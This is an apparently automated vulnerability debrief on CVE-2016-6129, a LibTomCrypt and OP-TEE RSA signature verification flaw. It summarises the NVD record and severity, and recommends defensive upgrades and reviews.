PatchSiren cyber security CVE debrief

CVE-2016-6129 Libtom CVE debrief

CVE-2016-6129 is a high-severity RSA signature verification flaw in LibTomCrypt’s rsa_verify_hash_ex function, used by OP-TEE before 2.2.0. The issue stems from missing validation that the message length matches the ASN.1 encoded data length, which can make RSA signature or certificate forgery easier for a remote attacker. NVD classifies the weakness as CWE-20 and rates it CVSS 3.0 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

Vendor: Libtom
Product: CVE-2016-6129
CVSS: HIGH 7.5
CISA KEV: Not listed in stored evidence
Original CVE published: 2017-02-13
Original CVE updated: 2026-05-13
Advisory published: 2017-02-13
Advisory updated: 2026-05-13

Who should care

Organizations using OP-TEE, LibTomCrypt, or downstream products that depend on their RSA signature verification or certificate validation paths should prioritize this issue. Security teams should especially review embedded, trusted-execution, and authentication workflows that rely on these libraries for integrity decisions.

Technical summary

According to the supplied NVD description, the flaw is in rsa_verify_hash_ex in rsa_verify_hash.c. The function does not validate that the message length equals the ASN.1 encoded data length. That missing check weakens RSA signature verification and can allow a remote attacker to leverage a Bleichenbacher-style signature forgery attack. The supplied NVD record maps the weakness to CWE-20 and lists affected ranges up to OP-TEE OS 2.1.0 and LibTomCrypt 1.17.

Defensive priority

High. The impact is integrity-only but direct: successful exploitation can undermine trust decisions made by signature verification or certificate validation. Because the attack is network-reachable and requires no privileges or user interaction in the supplied CVSS vector, affected deployments should be treated as urgent upgrade candidates.

Recommended defensive actions

Upgrade OP-TEE to 2.2.0 or later if it is in use.
Upgrade LibTomCrypt beyond version 1.17 if it is used directly or through a downstream product.
Review any RSA-based verification or certificate validation code paths that depend on these libraries.
Confirm whether embedded or trusted-execution deployments vendor-patch this issue rather than relying on upstream version numbers alone.
Use the linked vendor and patch references to verify fixed builds and rollout guidance.

Evidence notes

The supplied corpus identifies the issue in the NVD record for CVE-2016-6129 and cites the original description, affected CPE criteria, CVSS vector, and CWE-20 mapping. References include a Red Hat Bugzilla issue, a LibTomCrypt commit labeled as a patch/third-party advisory, and the OP-TEE advisories page. Published date in the supplied record is 2017-02-13T18:59:00.660Z; modified date is 2026-05-13T00:24:29.033Z.

Official resources

CVE-2016-6129 CVE record
CVE.org
CVE-2016-6129 NVD detail
NVD
Source item URL
nvd_modified
Mitigation or vendor reference
[email protected] - Issue Tracking, Patch
Mitigation or vendor reference
[email protected] - Issue Tracking, Patch, Third Party Advisory
Mitigation or vendor reference
[email protected] - Vendor Advisory

The supplied official record shows CVE publication on 2017-02-13T18:59:00.660Z and a later modification on 2026-05-13T00:24:29.033Z. No separate vendor disclosure date is included in the supplied corpus.